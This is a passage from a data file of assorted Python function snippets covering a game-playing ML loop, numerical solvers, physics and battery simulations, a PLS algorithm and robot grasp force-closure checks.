pred_ball_blocker // 200 # Determine if it is beyond the boundary\n if (bound > 0): # pred > 200 # fix landing position\n if (bound%2 == 0) : \n pred_ball_blocker = pred_ball_blocker - bound*200 \n else :\n pred_ball_blocker = 200 - (pred_ball_blocker - 200*bound)\n elif (bound < 0) : # pred < 0\n if (bound%2 ==1) :\n pred_ball_blocker = abs(pred_ball_blocker - (bound+1) *200)\n else :\n pred_ball_blocker = pred_ball_blocker + (abs(bound)*200)\n \n y = abs((415 - 260) // ball_vy)\n Pred.blocker_pred_x = blocker_x + Pred.blocker_vx * y \n if Pred.blocker_pred_x < 0: Pred.blocker_pred_x = abs(Pred.blocker_pred_x)\n elif Pred.blocker_pred_x > 170: Pred.blocker_pred_x = 170 - (Pred.blocker_pred_x - 170)\n \n if pred_ball_blocker >= Pred.blocker_pred_x-10 and pred_ball_blocker < Pred.blocker_pred_x+40:\n print(\"slice will hit blicker\")\n # don't slice \n # use origin ball vx to predict will hit blocker or not\n # if will hit blicker let ball go reverse direction\n y = abs((415 - 260) // ball_vy)\n pred_ball_blocker = pred_ball_1P + ball_vx * y\n bound = pred_ball_blocker // 200 # Determine if it is beyond the boundary\n if (bound > 0): # pred > 200 # fix landing position\n if (bound%2 == 0) : \n pred_ball_blocker = pred_ball_blocker - bound*200 \n else :\n pred_ball_blocker = 200 - (pred_ball_blocker - 200*bound)\n elif (bound < 0) : # pred < 0\n if (bound%2 ==1) :\n pred_ball_blocker = abs(pred_ball_blocker - (bound+1) *200)\n else :\n pred_ball_blocker = pred_ball_blocker + (abs(bound)*200)\n\n if pred_ball_blocker >= Pred.blocker_pred_x-10 and pred_ball_blocker < Pred.blocker_pred_x+40:\n print(\"will hit blocker, hit reversed direction\")\n if scene_info[\"ball_speed\"][0] > 0: return 2\n else: return 1\n else: \n print(\"will not hit blicker, do nothing\")\n return 0\n else:\n # slice\n print(\"slice will not hit blocker\")\n if scene_info[\"ball_speed\"][0] > 0: return 1\n else: return 2\n\n elif scene_info[\"ball_speed\"][1] > 0 : # 球正在向下 # ball goes down\n x = ( scene_info[\"platform_1P\"][1]-scene_info[\"ball\"][1] ) // scene_info[\"ball_speed\"][1] # 幾個frame以後會需要接 # x means how many frames before 
catch the ball\n Pred.pred = scene_info[\"ball\"][0]+(scene_info[\"ball_speed\"][0]*x) # 預測最終位置 # pred means predict ball landing site \n bound = Pred.pred // 200 # Determine if it is beyond the boundary\n if (bound > 0): # pred > 200 # fix landing position\n if (bound%2 == 0) : \n Pred.pred = Pred.pred - bound*200 \n else :\n Pred.pred = 200 - (Pred.pred - 200*bound)\n elif (bound < 0) : # pred < 0\n if (bound%2 ==1) :\n Pred.pred = abs(Pred.pred - (bound+1) *200)\n else :\n Pred.pred = Pred.pred + (abs(bound)*200)\n return move_to(player = '1P',pred = Pred.pred)\n \n else : # 球正在向上 # ball goes up\n return move_to(player = '1P',pred = 100)\n\n\n\n def ml_loop_for_2P(): # as same as 1P\n if scene_info[\"ball_speed\"][1] > 0 : \n return move_to(player = '2P',pred = 100)\n else : \n x = ( scene_info[\"platform_2P\"][1]+30-scene_info[\"ball\"][1] ) // scene_info[\"ball_speed\"][1] \n pred = scene_info[\"ball\"][0]+(scene_info[\"ball_speed\"][0]*x) \n bound = pred // 200 \n if (bound > 0):\n if (bound%2 == 0):\n pred = pred - bound*200 \n else :\n pred = 200 - (pred - 200*bound)\n elif (bound < 0) :\n if bound%2 ==1:\n pred = abs(pred - (bound+1) *200)\n else :\n pred = pred + (abs(bound)*200)\n return move_to(player = '2P',pred = pred)\n\n # 2. Inform the game process that ml process is ready\n comm.ml_ready()\n\n # 3. Start an endless loop\n while True:\n # 3.1. Receive the scene information sent from the game process\n scene_info = comm.recv_from_game()\n\n # 3.2. If either of two sides wins the game, do the updating or\n # resetting stuff and inform the game process when the ml process\n # is ready.\n if scene_info[\"status\"] != \"GAME_ALIVE\":\n # Do some updating or resetting stuff\n ball_served = False\n\n # 3.2.1 Inform the game process that\n # the ml process is ready for the next round\n comm.ml_ready()\n continue\n\n # 3.3 Put the code here to handle the scene information\n\n # 3.4 Send the instruction for this frame to the game process\n if not ball_served:\n comm.send_to_game({\"frame\": scene_info[\"frame\"], \"command\": \"SERVE_TO_LEFT\"})\n blocker_last_x = scene_info[\"blocker\"][0]\n Pred.last_command = 0\n ball_served = True\n else:\n if side == \"1P\":\n Pred.blocker_vx = scene_info[\"blocker\"][0] - blocker_last_x\n if scene_info[\"blocker\"][0] == 0: Pred.blocker_vx = 5\n elif scene_info[\"blocker\"][0] == 170: Pred.blocker_vx = -5\n command = ml_loop_for_1P()\n blocker_last_x = scene_info[\"blocker\"][0]\n Pred.last_command = command\n else:\n command = ml_loop_for_2P()\n\n if command == 0:\n comm.send_to_game({\"frame\": scene_info[\"frame\"], \"command\": \"NONE\"})\n elif command == 1:\n comm.send_to_game({\"frame\": scene_info[\"frame\"], \"command\": \"MOVE_RIGHT\"})\n else :\n comm.send_to_game({\"frame\": scene_info[\"frame\"], \"command\": \"MOVE_LEFT\"})", "def check_termination(self):\r\n \r\n # First check if we are doing termination based on running time\r\n if (self.options.time_limit):\r\n self.time = time.clock - self.time_start\r\n if (self.time >= self.options.maxtime):\r\n self.term_reason = 'Exceeded time limit'\r\n return\r\n \r\n # Now check if we are doing break by tolx\r\n if (self.options.use_tolx):\r\n if (np.sqrt(cua.dot(self.dx,self.dx).get())/\r\n np.sqrt(cua.dot(self.oldx,self.oldx).get()) < self.options.tolx):\r\n self.term_reason = 'Relative change in x small enough'\r\n return\r\n \r\n # Are we doing break by tolo (tol obj val)\r\n if (self.options.use_tolo and self.iter > 2):\r\n delta = abs(self.obj-self.oldobj)\r\n if (delta < 
self.options.tolo):\r\n self.term_reason ='Relative change in objvalue small enough'\r\n return\r\n\r\n # Check if change in x and gradient are small enough\r\n # we don't want that for now\r\n# if (np.sqrt((cua.dot(self.dx,self.dx).get())) < self.options.tolx) \\\r\n# or (np.sqrt(cua.dot(self.dg,self.dg).get()) < self.options.tolg):\r\n# self.term_reason = '|x_t+1 - x_t|=0 or |grad_t+1 - grad_t| < 1e-9'\r\n# return\r\n \r\n # Finally the plain old check if max iter has been achieved\r\n if (self.iter >= self.options.maxiter):\r\n self.term_reason = 'Maximum number of iterations reached'\r\n return\r\n \r\n # KKT violation\r\n if (self.options.use_kkt):\r\n if np.abs(np.sqrt(cua.dot(self.x,self.grad).get())) <= options.tolk:\r\n self.term_reason = '|x^T * grad| < opt.pbb_gradient_norm'\r\n return\r\n \r\n # Gradient check\r\n if (self.options.use_tolg):\r\n nr = cua.max(cua.fabs(self.grad)).get();\r\n if (nr < self.options.tolg):\r\n self.term_reason = '|| grad ||_inf < opt.tolg'\r\n return\r\n \r\n # No condition met, so return false\r\n self.term_reason = 0;", "def _simulate_all_cells(self):\n for ID in tqdm(self.condition_dict, desc='Simulating cells'):\n for n in range(len(self.condition_dict[ID])):\n cond_dict = self.condition_dict[ID][n]\n g, tc, rsh_mult, rs_mult, Io_mult, Il_mult, nnsvth_mult = cond_dict['E'], cond_dict['Tc'], cond_dict[\n 'Rsh_mult'], cond_dict['Rs_mult'], cond_dict['Io_mult'], cond_dict['Il_mult'], cond_dict['nnsvth_mult']\n # calculate the 5 parameters for each set of cell conditions\n\n # Eventually, replace this with derived 5-parameters\n iph, io, rs, rsh, nnsvth = pvlib.pvsystem.calcparams_cec(effective_irradiance=g, temp_cell=tc,\n alpha_sc=self.cell_parameters['alpha_sc'],\n a_ref=self.cell_parameters['a_ref'],\n I_L_ref=self.cell_parameters['I_L_ref'],\n I_o_ref=self.cell_parameters['I_o_ref'],\n R_sh_ref=self.cell_parameters['R_sh_ref'],\n R_s=self.cell_parameters['R_s'],\n Adjust=self.cell_parameters['Adjust'])\n rs, rsh, io, iph, nnsvth = rs * rs_mult, rsh * \\\n rsh_mult, io * Io_mult, iph * Il_mult, nnsvth * nnsvth_mult\n\n # calculate cell IV curves by condition, rather than by cell index\n voc_est = pvlib.singlediode.estimate_voc(iph, io, nnsvth)\n v = voltage_pts(self.num_points_in_IV, voc_est,\n self.module_parameters['breakdown_voltage'])\n i = pvlib.singlediode.bishop88_i_from_v(v, iph, io, rs, rsh, nnsvth,\n breakdown_factor=self.module_parameters['breakdown_factor'],\n breakdown_voltage=self.module_parameters[\n 'breakdown_voltage'],\n breakdown_exp=self.module_parameters['breakdown_exp'])\n\n # @dev: Uncomment if debugging pvlib bishop88 simulation results\n # plt.plot(v,i)\n # plt.xlim(-5,v[-1])\n # plt.ylim(0,iph+1)\n # plt.title(f\"{ID}: {n} :: {rs},\"\n # f\"{rsh}, {io}, {iph}, {nnsvth}\")\n # plt.show()\n\n self.condition_dict[ID][n]['V'] = v\n self.condition_dict[ID][n]['I'] = i\n self.condition_dict[ID][n]['E'] = g\n self.condition_dict[ID][n]['Tc'] = tc\n return", "def prepare_rhs(self, simulation):\n\n nv = simulation.container.nv\n sorder = simulation.container.sorder\n nspace = [1] * (len(sorder) - 1)\n v = self.stencil.get_all_velocities()\n\n gpu_support = simulation.container.gpu_support\n\n for key, value in self.value_bc.items():\n if value is not None:\n indices = np.where(self.ilabel == key)\n # TODO: check the index in sorder to be the most contiguous\n nspace[0] = indices[0].size\n k = self.istore[0, indices]\n\n s = 1 - self.distance[indices]\n coords = tuple()\n for i in range(simulation.domain.dim):\n x = 
simulation.domain.coords_halo[i][self.istore[i + 1, indices]]\n x += s * v[k, i] * simulation.domain.dx\n x = x.ravel()\n for j in range(\n 1, simulation.domain.dim\n ): # pylint: disable=unused-variable\n x = x[:, np.newaxis]\n coords += (x,)\n\n m = Array(nv, nspace, 0, sorder, gpu_support=gpu_support)\n m.set_conserved_moments(simulation.scheme.consm)\n\n f = Array(nv, nspace, 0, sorder, gpu_support=gpu_support)\n f.set_conserved_moments(simulation.scheme.consm)\n\n args = coords\n if isinstance(value, types.FunctionType):\n func = value\n elif isinstance(value, tuple):\n func = value[0]\n args += value[1]\n\n if self.time_bc[key]:\n func(f, m, 0, *args)\n else:\n func(f, m, *args)\n\n simulation.equilibrium(m)\n simulation.m2f(m, f)\n\n if self.generator.backend.upper() == \"LOOPY\":\n f.array_cpu[...] = f.array.get()\n\n self.feq[:, indices[0]] = f.swaparray.reshape((nv, indices[0].size))\n\n if self.time_bc[key]:\n self.func.append(func)\n self.args.append(args)\n self.f.append(f)\n self.m.append(m)\n self.indices.append(indices[0])", "def brents(f, x0, x1, max_iter=50, tolerance=1e-5):\n \n fx0 = f(x0)\n fx1 = f(x1)\n \n assert (fx0 * fx1) <= 0, \"Root not bracketed\" \n \n if abs(fx0) < abs(fx1):\n x0, x1 = x1, x0\n fx0, fx1 = fx1, fx0\n \n x2, fx2 = x0, fx0\n \n d = np.nan\n mflag = True\n steps_taken = 0\n \n while steps_taken < max_iter and abs(x1-x0) > tolerance:\n fx0 = f(x0)\n fx1 = f(x1)\n fx2 = f(x2)\n \n if fx0 != fx2 and fx1 != fx2:\n L0 = (x0 * fx1 * fx2) / ((fx0 - fx1) * (fx0 - fx2))\n L1 = (x1 * fx0 * fx2) / ((fx1 - fx0) * (fx1 - fx2))\n L2 = (x2 * fx1 * fx0) / ((fx2 - fx0) * (fx2 - fx1))\n new = L0 + L1 + L2\n \n else:\n new = x1 - ( (fx1 * (x1 - x0)) / (fx1 - fx0) )\n \n tt1 = (new < ((3 * x0 + x1) / 4) or new > x1)\n tt2 = (mflag == True and (abs(new - x1)) >= (abs(x1 - x2) / 2))\n tt3 = (mflag == False and (abs(new - x1)) >= (abs(x2 - d) / 2))\n tt4 = (mflag == True and (abs(x1 - x2)) < tolerance)\n tt5 = (mflag == False and (abs(x2 - d)) < tolerance)\n if (tt1 or\n tt2 or\n tt3 or\n tt4 or\n tt5):\n new = (x0 + x1) / 2\n mflag = True\n \n else:\n mflag = False\n \n fnew = f(new)\n d, x2 = x2, x1\n \n if (fx0 * fnew) < 0:\n x1 = new\n else:\n x0 = new\n \n if abs(fx0) < abs(fx1):\n x0, x1 = x1, x0\n \n steps_taken += 1\n \n return x1, steps_taken", "def eval_dryfriction():\n # Environment\n env = WAMBallInCupSim(num_dof=7, max_steps=1500)\n\n # Policy (random init)\n policy_hparam = dict(num_feat_per_dim=12, bounds=(np.array([0.0]), np.array([1.0])))\n policy = DualRBFLinearPolicy(env.spec, policy_hparam, dim_mask=2)\n\n # Do the rolllouts\n t_all = []\n qpos_all = []\n dp_vals = [0.0, 0.3, 0.6, 0.9, 1.2]\n print_cbt(f\"Run policy for stiction coefficients: {dp_vals}\")\n for dpv in dp_vals:\n env.reset(\n domain_param=dict(\n joint_1_dryfriction=dpv,\n joint_2_dryfriction=dpv,\n joint_3_dryfriction=dpv,\n joint_4_dryfriction=dpv,\n joint_5_dryfriction=dpv,\n joint_6_dryfriction=dpv,\n joint_7_dryfriction=dpv,\n )\n )\n ro = rollout(env, policy, render_mode=RenderMode(video=False), eval=True)\n t_all.append(ro.time[:-1])\n qpos_all.append(ro.env_infos[\"qpos\"])\n\n # Plot\n fig, ax = plt.subplots(nrows=env.num_dof, sharex=\"all\", figsize=(16, 7))\n for i, idx_joint in enumerate([dof for dof in range(env.num_dof)]):\n ax[i].set_prop_cycle(color=plt.get_cmap(\"cividis\")(np.linspace(0, 1, env.num_dof)))\n ax[i].set_ylabel(f\"joint {idx_joint+1} pos [rad]\")\n for j in range(len(dp_vals)):\n ax[i].plot(t_all[j], qpos_all[j][:, idx_joint], ls=\"--\", label=f\"s = 
{dp_vals[j]}\")\n if i == 0:\n ax[i].legend(ncol=len(dp_vals))\n ax[-1].set_xlabel(\"time [s]\")\n plt.suptitle(\"Evaluation of joint stiction coefficients\")\n plt.show()", "def weak_repulsion_boundary(Cents,a,k, CV_matrix,n_c,n_C):\n CCW = np.dstack((roll_reverse(Cents[:,:,0]),roll_reverse(Cents[:,:,1])))#np.column_stack((Cents[:,1:3],Cents[:,0].reshape(-1,1,2)))\n CCW_displacement = Cents - CCW\n rij = np.sqrt(CCW_displacement[:,:,0]**2 + CCW_displacement[:,:,1]**2)\n norm_disp = (CCW_displacement.T/rij.T).T\n V_soft_mag = -k*(rij - 2*a)*(rij<2*a)\n V_soft_CCW = (V_soft_mag.T*norm_disp.T).T\n V_soft_CW = -(roll_forward(V_soft_mag).T*norm_disp.T).T\n V_soft = V_soft_CW + V_soft_CCW\n F_soft = np.zeros((n_c, 2))\n for i in range(3):\n F_soft += np.asfortranarray(CV_matrix[:, :, i])@np.asfortranarray(V_soft[:, i])\n F_soft[n_C:] = 0\n return F_soft", "def engine_boost(self):\r\n gamma = 6.67e-11\r\n esc_velocity = np.sqrt((2*gamma*self.home_m*2.0e30)/(self.home_r*10**3))\r\n print esc_velocity\r\n esc_mom, per_force = self.escaped_momentum()\r\n pos, vel,part_esc, impact, part_coll, mom = self.box_collision_info()\r\n\r\n rock_vel = []; rock_vel.append(0)\r\n rock_pos = []; rock_pos.append(0)\r\n #fuel = []; fuel.append(0)\r\n\r\n ##################constants####################\r\n ###############################################\r\n rocket_mass = 1100; num_engine = 1.186e13\r\n rocket_time = 20*60; up_time = 0\r\n mass_esc = (num_engine*part_esc*self.m)/self.total_time\r\n ###############################################\r\n\r\n delta_time = rocket_time/(1000)\r\n i = 0\r\n uptime = 0\r\n fuel = 55000\r\n velocity = 32100\r\n total_force = (esc_mom/self.total_time)*num_engine\r\n print total_force, 'newton'\r\n while (rock_vel[-1] < velocity and up_time < rocket_time and fuel > 0):\r\n total_acceleration = total_force/(rocket_mass + fuel)\r\n\r\n rock_vel.append(rock_vel[-1] + total_acceleration*delta_time)\r\n\r\n #fuel.append(fuel[-1] + mass_esc*delta_time)\r\n fuel -= mass_esc*delta_time\r\n\r\n i +=1\r\n uptime += delta_time\r\n\r\n\r\n if rock_vel[-1] > velocity:\r\n print \"you have reached escape velocity\"\r\n print rock_vel[-1]\r\n print fuel\r\n \"\"\"myStarSystem.massNeededCheck(num_engine, esc_velocity,\r\n total_force/num_engine, part_esc/(self.total_time), fuel[-1])\r\n \"\"\"\r\n if fuel < 0:\r\n print 'fuel done', fuel\r\n print rock_vel[-1], 'm/s'\r\n break\r\n\r\n plot(linspace(0,20*60, len(rock_vel)), rock_vel)\r\n show()\r\n return total_force", "def process_boundary_conditions(self, model):\n\n processed_bcs = {}\n\n # process and set pybamm.variables first incase required\n # in discrisation of other boundary conditions\n for key, bcs in model.boundary_conditions.items():\n processed_bcs[key] = {}\n\n # check if the boundary condition at the origin for sphere domains is other\n # than no flux\n for subdomain in key.domain:\n if (\n self.mesh[subdomain].coord_sys\n in [\"spherical polar\", \"cylindrical polar\"]\n and list(self.mesh.geometry[subdomain].values())[0][\"min\"] == 0\n ):\n if bcs[\"left\"][0].value != 0 or bcs[\"left\"][1] != \"Neumann\":\n raise pybamm.ModelError(\n \"Boundary condition at r = 0 must be a homogeneous \"\n \"Neumann condition for {} coordinates\".format(\n self.mesh[subdomain].coord_sys\n )\n )\n\n # Handle any boundary conditions applied on the tabs\n if any(\"tab\" in side for side in list(bcs.keys())):\n bcs = self.check_tab_conditions(key, bcs)\n\n # Process boundary conditions\n for side, bc in bcs.items():\n eqn, typ = bc\n 
pybamm.logger.debug(\"Discretise {} ({} bc)\".format(key, side))\n processed_eqn = self.process_symbol(eqn)\n processed_bcs[key][side] = (processed_eqn, typ)\n\n return processed_bcs", "def potentialSolver5(self, w, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n # Step 1: create *integer* array the same size as u \n x = np.zeros_like(self.phi,dtype=np.int)\n\n # Step 2: populate all non-boundary cells with running numbers from 1 to (n-2)^2\n x[1:-1,1:-1,1:-1] = np.arange(1,(self.ni-2)*(self.nj-2)*(self.nk-2)+1).reshape(self.ni-2,self.nj-2,self.nk-2)\n\n # Step 3: get indices of even (red) and odd (black) points\n ir, jr, kr = np.where((x>0) & (x%2 == 0)) # indices of red pts = indices of even numbers\n ib, jb, kb = np.where((x>0) & (x%2 == 1)) # indices of black pts = indices of odd numbers\n\n\n \n # solve potential\n for it in np.arange(1,max_it+1):\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\" \n \"\"\"\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n \"\"\" \n \n \"\"\"\n #standard internal open node\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n (self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1])+\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1])+\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk]))/(2*dx2+2*dy2+2*dz2)\n \n \"\"\"\n \"\"\"\n # sucessive over relaxation \n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] +\\\n 1.8*(self.phi_new[1:self.ni-1,1:self.nj-1,1:self.nk-1] - \\\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1])\n \"\"\"\n \n # Red point update\n self.phi[ir,jr,kr] = (1-w)*self.phi[ir,jr,kr] + (1.0/6.0)*w*(self.phi[ir+1,jr,kr] + self.phi[ir-1,jr,kr] +\\\n self.phi[ir,jr+1,kr] + self.phi[ir,jr-1,kr] +\\\n self.phi[ir,jr,kr+1] + self.phi[ir,jr,kr-1] +\\\n (self.rho[ir,jr,kr]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n # Black point update\n self.phi[ib,jb,kb] = (1-w)*self.phi[ib,jb,kb] + (1.0/6.0)*w*(self.phi[ib+1,jb,kb] + self.phi[ib-1,jb,kb] +\\\n self.phi[ib,jb+1,kb] + self.phi[ib,jb-1,kb] +\\\n self.phi[ib,jb,kb+1] + self.phi[ib,jb,kb-1] +\\\n (self.rho[ib,jb,kb]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n #check for convergence*/\n if it%25==0:\n sum = 0;\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\"\n\n self.R[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n -self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1]) +\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1]) +\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk])\n\n sum = 
np.sum(self.R**2)\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n\n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged", "def basiscond(self): # 3\n res,resargs = self.__obj.basiscond()\n if res != 0:\n result,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)\n _nrmbasis_return_value,_nrminvbasis_return_value = resargs\n return _nrmbasis_return_value,_nrminvbasis_return_value", "def _nipals_twoblocks_inner_loop(X, Y, x_kind='linear', y_kind='linear', \n x_params=None, y_params=None, max_iter=500, tol=1e-06,\n flag_first_iter=True, learning_rate=1.):\n# STEP 4\n x_score = f(X, kind=x_kind, params=x_params)[:, [0]]\n# STEP 5\n y_score = f(Y, kind=y_kind, params=y_params)[:, [0]]\n x_weights_old = 0\n ite = 1\n eps = np.finfo(X.dtype).eps\n # Inner loop of the Wold algo.\n# STEP 6\n while True:\n# STEP 7 \n y_score_old = y_score.copy()\n x_score_old = x_score.copy()\n# STEP 8 \n X_hat = f(X, kind=x_kind, params=x_params)\n Y_hat = f(Y, kind=y_kind, params=y_params)\n # 1.1 Update u: the X weights\n # Mode A regress each X column on y_score\n# STEP 9\n x_weights = np.dot(X_hat.T, y_score) / np.dot(y_score.T, y_score)\n # If y_score only has zeros x_weights will only have zeros. In\n # this case add an epsilon to converge to a more acceptable\n # solution\n if np.dot(x_weights.T, x_weights) < eps:\n x_weights += eps\n # 1.2 Normalize u\n x_weights /= np.sqrt(np.dot(x_weights.T, x_weights)) + eps\n # 1.3 Update x_score: the X latent scores\n# STEP 10\n x_score = np.dot(X_hat, x_weights)\n# STEP 11\n if (x_kind not in NONPARAMETRICAL_TRANSROMATIONS) and flag_first_iter:\n J_t = jacob(X, x_score, kind=x_kind, params=x_params)\n delta_x_params = np.linalg.inv(J_t.T.dot(J_t)).dot(J_t.T).dot(x_score - x_score_old)[:, 0]\n# STEP 12\n x_params += learning_rate * delta_x_params\n # 2.1 Update y_weights\n # Mode A regress each Y column on x_score\n# STEP 13\n y_weights = np.dot(Y_hat.T, x_score) / np.dot(x_score.T, x_score)\n y_weights /= np.sqrt(np.dot(y_weights.T, y_weights)) + eps\n # 2.2 Update y_score: the Y latent scores\n# STEP 14\n y_score = np.dot(Y_hat, y_weights)\n# STEP 15\n if (y_kind not in NONPARAMETRICAL_TRANSROMATIONS) and flag_first_iter:\n J_u = jacob(Y, y_score, kind=y_kind, params=y_params)\n delta_y_params = np.linalg.inv(J_u.T.dot(J_u)).dot(J_u.T).dot(y_score - y_score_old)[:, 0]\n# STEP 16\n y_params += learning_rate * delta_y_params\n x_weights_diff = x_weights - x_weights_old\n if np.dot(x_weights_diff.T, x_weights_diff) < tol or Y.shape[1] == 1:\n break\n if ite == max_iter:\n warnings.warn('Maximum number of iterations reached')\n break\n x_weights_old = x_weights\n ite += 1\n return x_weights, y_weights, ite", "def achieves_force_closure(points, normals, mu, debug=False):\n assert len(points) == len(normals)\n assert mu >= 0.0\n assert_unit_normals(normals)\n\n ## YOUR CODE HERE\n G = get_G(points,normals)\n if not is_full_row_rank(G):\n print(\"G is not full row rank\")\n return False\n \n N_points = len(points)\n max_force = 1000\n \n mp = MathematicalProgram()\n \n ## Decision vars\n # force tangent to surface\n forces_x = mp.NewContinuousVariables(N_points,\"forces_x\")\n # force normal to surface\n forces_z = mp.NewContinuousVariables(N_points,\"forces_z\") \n # -1<=slack_var<=0 used to convert inequalities to strict inequalities \n slack_var = mp.NewContinuousVariables(1,\"slack_var\")\n\n # put force vars in 
single array\n forces = [None]*2*N_points\n for point_idx in range(N_points):\n forces[point_idx*2] = forces_x[point_idx]\n forces[point_idx*2+1] = forces_z[point_idx]\n\n # ensure forces/moments add to zero\n for row_idx in range(np.shape(G)[0]):\n # 3 rows (LMB_x, LMB_z, AMB) = 0 for static system\n mp.AddLinearConstraint(G[row_idx,:].dot(forces) == 0)\n if debug:\n print(\"Static force/moment constraints = 0:\")\n print(G[row_idx,:].dot(forces))\n \n # ensure forces stay within friction cone and use slack to avoid trivial 0 solution\n for point_idx in range(N_points):\n # normal force must be positive (slack allows us to catch if it's zero)\n mp.AddLinearConstraint(forces_z[point_idx] + slack_var[0] >= 0)\n mp.AddLinearConstraint(forces_x[point_idx] <= mu*forces_z[point_idx] + slack_var[0])\n mp.AddLinearConstraint(forces_x[point_idx] >= -(mu*forces_z[point_idx] + slack_var[0]))\n \n # restrict slack\n mp.AddLinearConstraint(slack_var[0] <= 0)\n mp.AddLinearConstraint(slack_var[0] >= -1)\n mp.AddLinearCost(slack_var[0])\n \n # restrict solution within bounds\n for force in forces:\n mp.AddLinearConstraint(force >= -max_force)\n mp.AddLinearConstraint(force <= max_force) \n \n result = Solve(mp)\n if (not result.is_success()):\n print(\"solver failed to find solution\")\n return False\n \n gamma = result.GetSolution(slack_var)\n if (gamma < 0):\n print(\"acheived force closure, gamma = {}\".format(gamma))\n if debug:\n x = result.GetSolution(forces_x)\n z = result.GetSolution(forces_z)\n print(\"solution forces_x: {}\".format(x))\n print(\"solution forces_z: {}\".format(z))\n return True\n else:\n print(\"only trivial solution with 0 forces found\")\n return False", "def impose_boundary_conditions(self) -> _ImposeBoundaryConditionsResults:\n\n stiffness = self.get_stiffness_matrix()\n force_vector = self.get_force_vector()\n\n restrained_dofs = self.get_supported_dofs()\n\n for axis in range(2):\n stiffness = np.delete(\n stiffness,\n [dof for dof in restrained_dofs],\n axis=axis,\n )\n\n force_vector = np.delete(\n force_vector,\n [dof for dof in restrained_dofs],\n axis=0,\n )\n\n return _ImposeBoundaryConditionsResults(\n stiffness=stiffness,\n force=force_vector,\n )", "def potentialSolver4(self, w, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n # Step 1: create *integer* array the same size as u \n x = np.zeros_like(self.phi,dtype=np.int)\n\n # Step 2: populate all non-boundary cells with running numbers from 1 to (n-2)^2\n x[1:-1,1:-1,1:-1] = np.arange(1,(self.ni-2)*(self.nj-2)*(self.nk-2)+1).reshape(self.ni-2,self.nj-2,self.nk-2)\n\n # Step 3: get indices of even (red) and odd (black) points\n ir, jr, kr = np.where((x>0) & (x%2 == 0)) # indices of red pts = indices of even numbers\n ib, jb, kb = np.where((x>0) & (x%2 == 1)) # indices of black pts = indices of odd numbers\n\n\n \n # solve potential\n for it in np.arange(1,max_it+1):\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\" \n \"\"\"\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n \"\"\" \n 
